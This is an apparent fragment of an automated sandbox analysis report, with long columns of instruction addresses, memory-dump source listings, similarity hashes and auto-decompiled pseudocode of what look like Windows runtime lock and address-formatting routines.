                                                                                                                                                                                                          0x009321e9
                                                                                                                                                                                                          0x009321ec
                                                                                                                                                                                                          0x009321f1
                                                                                                                                                                                                          0x009321f6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009321f8
                                                                                                                                                                                                          0x009321fb
                                                                                                                                                                                                          0x00932206
                                                                                                                                                                                                          0x0093220b
                                                                                                                                                                                                          0x0093220c
                                                                                                                                                                                                          0x00932217
                                                                                                                                                                                                          0x00932226
                                                                                                                                                                                                          0x0093222b
                                                                                                                                                                                                          0x0093222c
                                                                                                                                                                                                          0x0093222f
                                                                                                                                                                                                          0x00932232
                                                                                                                                                                                                          0x00932235
                                                                                                                                                                                                          0x00932235
                                                                                                                                                                                                          0x0093223a
                                                                                                                                                                                                          0x0093223f
                                                                                                                                                                                                          0x00932241
                                                                                                                                                                                                          0x00932243
                                                                                                                                                                                                          0x00932248
                                                                                                                                                                                                          0x00932248
                                                                                                                                                                                                          0x0093224d
                                                                                                                                                                                                          0x0093224f
                                                                                                                                                                                                          0x00932262
                                                                                                                                                                                                          0x00932263
                                                                                                                                                                                                          0x00932268
                                                                                                                                                                                                          0x00932269
                                                                                                                                                                                                          0x00932269
                                                                                                                                                                                                          0x00932269
                                                                                                                                                                                                          0x0093226d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932276
                                                                                                                                                                                                          0x00932279
                                                                                                                                                                                                          0x0093227e
                                                                                                                                                                                                          0x00932283
                                                                                                                                                                                                          0x00932287
                                                                                                                                                                                                          0x0093228a
                                                                                                                                                                                                          0x0093228d
                                                                                                                                                                                                          0x0093228f
                                                                                                                                                                                                          0x009322bc
                                                                                                                                                                                                          0x009322bc
                                                                                                                                                                                                          0x009322bc
                                                                                                                                                                                                          0x009322be
                                                                                                                                                                                                          0x009322c4
                                                                                                                                                                                                          0x009322cc
                                                                                                                                                                                                          0x009322d0
                                                                                                                                                                                                          0x009322d6
                                                                                                                                                                                                          0x009322d7
                                                                                                                                                                                                          0x009322da
                                                                                                                                                                                                          0x009322df
                                                                                                                                                                                                          0x009322e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322e6
                                                                                                                                                                                                          0x009322e9
                                                                                                                                                                                                          0x009322f4
                                                                                                                                                                                                          0x009322f9
                                                                                                                                                                                                          0x009322fa
                                                                                                                                                                                                          0x00932305
                                                                                                                                                                                                          0x00932314
                                                                                                                                                                                                          0x00932319
                                                                                                                                                                                                          0x0093231a
                                                                                                                                                                                                          0x0093231d
                                                                                                                                                                                                          0x00932320
                                                                                                                                                                                                          0x00932323
                                                                                                                                                                                                          0x00932323
                                                                                                                                                                                                          0x00932328
                                                                                                                                                                                                          0x0093232d
                                                                                                                                                                                                          0x0093232f
                                                                                                                                                                                                          0x00932331
                                                                                                                                                                                                          0x00932336
                                                                                                                                                                                                          0x00932336
                                                                                                                                                                                                          0x0093233b
                                                                                                                                                                                                          0x0093233d
                                                                                                                                                                                                          0x00932350
                                                                                                                                                                                                          0x00932351
                                                                                                                                                                                                          0x00932356
                                                                                                                                                                                                          0x00932359
                                                                                                                                                                                                          0x00932359
                                                                                                                                                                                                          0x0093235b
                                                                                                                                                                                                          0x0093235d
                                                                                                                                                                                                          0x008f5367
                                                                                                                                                                                                          0x008f536b
                                                                                                                                                                                                          0x008f5372
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932363
                                                                                                                                                                                                          0x00932363
                                                                                                                                                                                                          0x00932369
                                                                                                                                                                                                          0x0093236a
                                                                                                                                                                                                          0x0093236c
                                                                                                                                                                                                          0x00932371
                                                                                                                                                                                                          0x00932373
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932379
                                                                                                                                                                                                          0x00932379
                                                                                                                                                                                                          0x0093237a
                                                                                                                                                                                                          0x0093237f
                                                                                                                                                                                                          0x0093237f
                                                                                                                                                                                                          0x00932385
                                                                                                                                                                                                          0x00932386
                                                                                                                                                                                                          0x00932389
                                                                                                                                                                                                          0x0093238e
                                                                                                                                                                                                          0x00932390
                                                                                                                                                                                                          0x008f5378
                                                                                                                                                                                                          0x008f537c
                                                                                                                                                                                                          0x00932396
                                                                                                                                                                                                          0x00932396
                                                                                                                                                                                                          0x00932397
                                                                                                                                                                                                          0x0093239c
                                                                                                                                                                                                          0x009323a2
                                                                                                                                                                                                          0x009323a3
                                                                                                                                                                                                          0x009323a6
                                                                                                                                                                                                          0x009323ab

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00932206
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-4236105082
                                                                                                                                                                                                          • Opcode ID: 20596a9b94ef2d0a416c7791c56a5f7929d12b4115e9be6a6c86df86e026be5b
                                                                                                                                                                                                          • Instruction ID: 23833a554ffb31749fbd20ba2a46525f3b705d0a0be1ace1d44800ba06187315
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20596a9b94ef2d0a416c7791c56a5f7929d12b4115e9be6a6c86df86e026be5b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D5127717042156BEB14CB19DC81FA733AEEBD4720F218229FD65DB386DA75EC818B90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                          			E009114C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v10;
                                                                                                                                                                                                          				char _v140;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                          				intOrPtr _t45;
                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                          				intOrPtr* _t52;
                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t51 = __edx;
                                                                                                                                                                                                          				_t24 =  *0x9b2088; // 0x7753cceb
                                                                                                                                                                                                          				_v8 = _t24 ^ _t57;
                                                                                                                                                                                                          				_t45 = _a16;
                                                                                                                                                                                                          				_t53 = _a4;
                                                                                                                                                                                                          				_t52 = _a20;
                                                                                                                                                                                                          				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                          					_t26 = 0xc000000d;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					if(_t45 == 0) {
                                                                                                                                                                                                          						if( *_t52 == _t45) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                          						_t28 =  &_v140;
                                                                                                                                                                                                          						if(_a12 != 0) {
                                                                                                                                                                                                          							_push("[");
                                                                                                                                                                                                          							_push(0x41);
                                                                                                                                                                                                          							_push( &_v140);
                                                                                                                                                                                                          							_t29 = E00907707();
                                                                                                                                                                                                          							_t58 = _t58 + 0xc;
                                                                                                                                                                                                          							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t54 = E009113CB(_t53, _t28);
                                                                                                                                                                                                          						if(_a8 != 0) {
                                                                                                                                                                                                          							_t34 = E00907707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                                                                          							_t58 = _t58 + 0x10;
                                                                                                                                                                                                          							_t54 = _t54 + _t34 * 2;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_a12 != 0) {
                                                                                                                                                                                                          							_t40 = E00907707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                                                                          							_t58 = _t58 + 0x10;
                                                                                                                                                                                                          							_t54 = _t54 + _t40 * 2;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                                                                          						 *_t52 = _t53;
                                                                                                                                                                                                          						if( *_t52 < _t53) {
                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E008D2340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                                                                          							_t26 = 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E008DE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                                                                          			}





















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 0093EA22
                                                                                                                                                                                                            • Part of subcall function 009113CB: ___swprintf_l.LIBCMT ref: 0091146B
                                                                                                                                                                                                            • Part of subcall function 009113CB: ___swprintf_l.LIBCMT ref: 00911490
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 0091156D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                                                          • Opcode ID: 7bce843690f61ed57dc5920b09d3ad977413dc786030d1e3a33b90c63e9cbc21
                                                                                                                                                                                                          • Instruction ID: 39b2492fc980205c992cc91140eda90a83988562851e9b8d81dabc327dd9ce90
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bce843690f61ed57dc5920b09d3ad977413dc786030d1e3a33b90c63e9cbc21
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60219372A0021DABCF21DE58CC41AEA73BDFB90710F544556FD56D3280EB74AA988BE1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                          			E008F53A5(signed int _a4, char _a8) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                          				signed int _t64;
                                                                                                                                                                                                          				signed int _t71;
                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                          				intOrPtr _t78;
                                                                                                                                                                                                          				signed int* _t79;
                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                          				signed int _t92;
                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t64 = _a4;
                                                                                                                                                                                                          				_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                          				_t71 = _t64 + 0x28;
                                                                                                                                                                                                          				_push(_t92);
                                                                                                                                                                                                          				if(_t32 < 0) {
                                                                                                                                                                                                          					_t78 =  *[fs:0x18];
                                                                                                                                                                                                          					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						__eflags = _t32 | 0xffffffff;
                                                                                                                                                                                                          						asm("lock xadd [ecx], eax");
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_push(_t86);
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                          						__eflags = _t32;
                                                                                                                                                                                                          						if(_t32 == 0) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _a8;
                                                                                                                                                                                                          						if(_a8 == 0) {
                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                          							_t79 = _t64 + 0x24;
                                                                                                                                                                                                          							_t71 = 1;
                                                                                                                                                                                                          							asm("lock xadd [eax], ecx");
                                                                                                                                                                                                          							_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                          							_a4 = _t32;
                                                                                                                                                                                                          							__eflags = _t32;
                                                                                                                                                                                                          							if(_t32 != 0) {
                                                                                                                                                                                                          								L19:
                                                                                                                                                                                                          								_t86 = 0;
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                          									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                                                                          									asm("sbb esi, esi");
                                                                                                                                                                                                          									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009b01c0;
                                                                                                                                                                                                          									_push(_t92);
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									_t37 = E008CF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                                                                          									__eflags = _t37 - 0x102;
                                                                                                                                                                                                          									if(_t37 != 0x102) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t71 =  *(_t92 + 4);
                                                                                                                                                                                                          									_t85 =  *_t92;
                                                                                                                                                                                                          									_t51 = E00914FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                                                                          									_push(_t85);
                                                                                                                                                                                                          									_push(_t51);
                                                                                                                                                                                                          									E00923F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                                                                          									E00923F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                                                                          									_t86 = _t86 + 1;
                                                                                                                                                                                                          									_t105 = _t104 + 0x28;
                                                                                                                                                                                                          									__eflags = _t86 - 2;
                                                                                                                                                                                                          									if(__eflags > 0) {
                                                                                                                                                                                                          										E0095217A(_t71, __eflags, _t64);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									_push(0x65);
                                                                                                                                                                                                          									E00923F92();
                                                                                                                                                                                                          									_t104 = _t105 + 0xc;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t37;
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									_push(_t37);
                                                                                                                                                                                                          									E00913915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                          									_t40 =  *_t71;
                                                                                                                                                                                                          									 *_t71 = 0;
                                                                                                                                                                                                          									__eflags = _t40;
                                                                                                                                                                                                          									if(_t40 == 0) {
                                                                                                                                                                                                          										L1:
                                                                                                                                                                                                          										_t42 = E008F5384(_t92 + 0x24);
                                                                                                                                                                                                          										if(_t42 != 0) {
                                                                                                                                                                                                          											goto L31;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L2;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                                                                          										_push( &_a4);
                                                                                                                                                                                                          										_push(_t40);
                                                                                                                                                                                                          										_t49 = E008CF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                                                                          										__eflags = _t49;
                                                                                                                                                                                                          										if(__eflags >= 0) {
                                                                                                                                                                                                          											goto L1;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_push(_t49);
                                                                                                                                                                                                          											E00913915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                                                                          											L31:
                                                                                                                                                                                                          											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                                          											_push( &_a4);
                                                                                                                                                                                                          											_push(1);
                                                                                                                                                                                                          											_t42 = E008CF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                                          											__eflags = _t42;
                                                                                                                                                                                                          											if(__eflags >= 0) {
                                                                                                                                                                                                          												L2:
                                                                                                                                                                                                          												return _t42;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_push(_t42);
                                                                                                                                                                                                          												E00913915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                                          												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                                          												_push( &_a4);
                                                                                                                                                                                                          												_push(1);
                                                                                                                                                                                                          												_t42 = E008CF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                                          												__eflags = _t42;
                                                                                                                                                                                                          												if(__eflags >= 0) {
                                                                                                                                                                                                          													goto L2;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_push(_t42);
                                                                                                                                                                                                          													_t45 = E00913915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                                          													asm("int3");
                                                                                                                                                                                                          													while(1) {
                                                                                                                                                                                                          														_t74 = _t45;
                                                                                                                                                                                                          														__eflags = _t45 - 1;
                                                                                                                                                                                                          														if(_t45 != 1) {
                                                                                                                                                                                                          															break;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														_t86 = _t86 | 0xffffffff;
                                                                                                                                                                                                          														_t45 = _t74;
                                                                                                                                                                                                          														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                                          														__eflags = _t45 - _t74;
                                                                                                                                                                                                          														if(_t45 != _t74) {
                                                                                                                                                                                                          															continue;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t46 =  *[fs:0x18];
                                                                                                                                                                                                          															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                                                                          															return _t46;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L38;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													E008F5329(_t74, _t92);
                                                                                                                                                                                                          													_push(1);
                                                                                                                                                                                                          													_t48 = E008F53A5(_t92);
                                                                                                                                                                                                          													return _t48;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t71 =  *_t79;
                                                                                                                                                                                                          								__eflags = _t71;
                                                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                          										_t57 = _t71;
                                                                                                                                                                                                          										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                          										__eflags = _t57 - _t71;
                                                                                                                                                                                                          										if(_t57 == _t71) {
                                                                                                                                                                                                          											break;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t71 = _t57;
                                                                                                                                                                                                          										__eflags = _t57;
                                                                                                                                                                                                          										if(_t57 > 0) {
                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t32 = _a4;
                                                                                                                                                                                                          									__eflags = _t71;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									goto L19;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L38;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t71 = _t71 | 0xffffffff;
                                                                                                                                                                                                          					_t32 = 0;
                                                                                                                                                                                                          					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                          					if(0 != 0) {
                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L38:
                                                                                                                                                                                                          			}


























                                                                                                                                                                                                          0x0093235d
                                                                                                                                                                                                          0x008f5367
                                                                                                                                                                                                          0x008f536b
                                                                                                                                                                                                          0x008f5372
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932363
                                                                                                                                                                                                          0x00932363
                                                                                                                                                                                                          0x00932369
                                                                                                                                                                                                          0x0093236a
                                                                                                                                                                                                          0x0093236c
                                                                                                                                                                                                          0x00932371
                                                                                                                                                                                                          0x00932373
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932379
                                                                                                                                                                                                          0x00932379
                                                                                                                                                                                                          0x0093237a
                                                                                                                                                                                                          0x0093237f
                                                                                                                                                                                                          0x0093237f
                                                                                                                                                                                                          0x00932385
                                                                                                                                                                                                          0x00932386
                                                                                                                                                                                                          0x00932389
                                                                                                                                                                                                          0x0093238e
                                                                                                                                                                                                          0x00932390
                                                                                                                                                                                                          0x008f5378
                                                                                                                                                                                                          0x008f537c
                                                                                                                                                                                                          0x00932396
                                                                                                                                                                                                          0x00932396
                                                                                                                                                                                                          0x00932397
                                                                                                                                                                                                          0x0093239c
                                                                                                                                                                                                          0x009323a2
                                                                                                                                                                                                          0x009323a3
                                                                                                                                                                                                          0x009323a6
                                                                                                                                                                                                          0x009323ab
                                                                                                                                                                                                          0x009323ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009323b3
                                                                                                                                                                                                          0x009323b3
                                                                                                                                                                                                          0x009323b4
                                                                                                                                                                                                          0x009323b9
                                                                                                                                                                                                          0x009323ba
                                                                                                                                                                                                          0x009323ba
                                                                                                                                                                                                          0x009323bc
                                                                                                                                                                                                          0x009323bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00929153
                                                                                                                                                                                                          0x00929158
                                                                                                                                                                                                          0x0092915a
                                                                                                                                                                                                          0x0092915e
                                                                                                                                                                                                          0x00929160
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00929166
                                                                                                                                                                                                          0x00929166
                                                                                                                                                                                                          0x00929171
                                                                                                                                                                                                          0x00929176
                                                                                                                                                                                                          0x00929176
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00929160
                                                                                                                                                                                                          0x009323c6
                                                                                                                                                                                                          0x009323cb
                                                                                                                                                                                                          0x009323ce
                                                                                                                                                                                                          0x009323d7
                                                                                                                                                                                                          0x009323d7
                                                                                                                                                                                                          0x009323ad
                                                                                                                                                                                                          0x00932390
                                                                                                                                                                                                          0x00932373
                                                                                                                                                                                                          0x0093233f
                                                                                                                                                                                                          0x0093233f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093233f
                                                                                                                                                                                                          0x00932291
                                                                                                                                                                                                          0x00932291
                                                                                                                                                                                                          0x00932293
                                                                                                                                                                                                          0x00932295
                                                                                                                                                                                                          0x0093229a
                                                                                                                                                                                                          0x009322a1
                                                                                                                                                                                                          0x009322a3
                                                                                                                                                                                                          0x009322a7
                                                                                                                                                                                                          0x009322a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322ab
                                                                                                                                                                                                          0x009322ad
                                                                                                                                                                                                          0x009322af
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322af
                                                                                                                                                                                                          0x009322b1
                                                                                                                                                                                                          0x009322b4
                                                                                                                                                                                                          0x009322b4
                                                                                                                                                                                                          0x009322b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322b6
                                                                                                                                                                                                          0x0093228f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093226d
                                                                                                                                                                                                          0x008f53cb
                                                                                                                                                                                                          0x008f53ce
                                                                                                                                                                                                          0x008f53d0
                                                                                                                                                                                                          0x008f53d4
                                                                                                                                                                                                          0x008f53d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f53d8
                                                                                                                                                                                                          0x008f53e3
                                                                                                                                                                                                          0x008f53ea
                                                                                                                                                                                                          0x008f53ea
                                                                                                                                                                                                          0x008f53d6
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009322F4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 00932328
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 0093230B
                                                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009322FC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
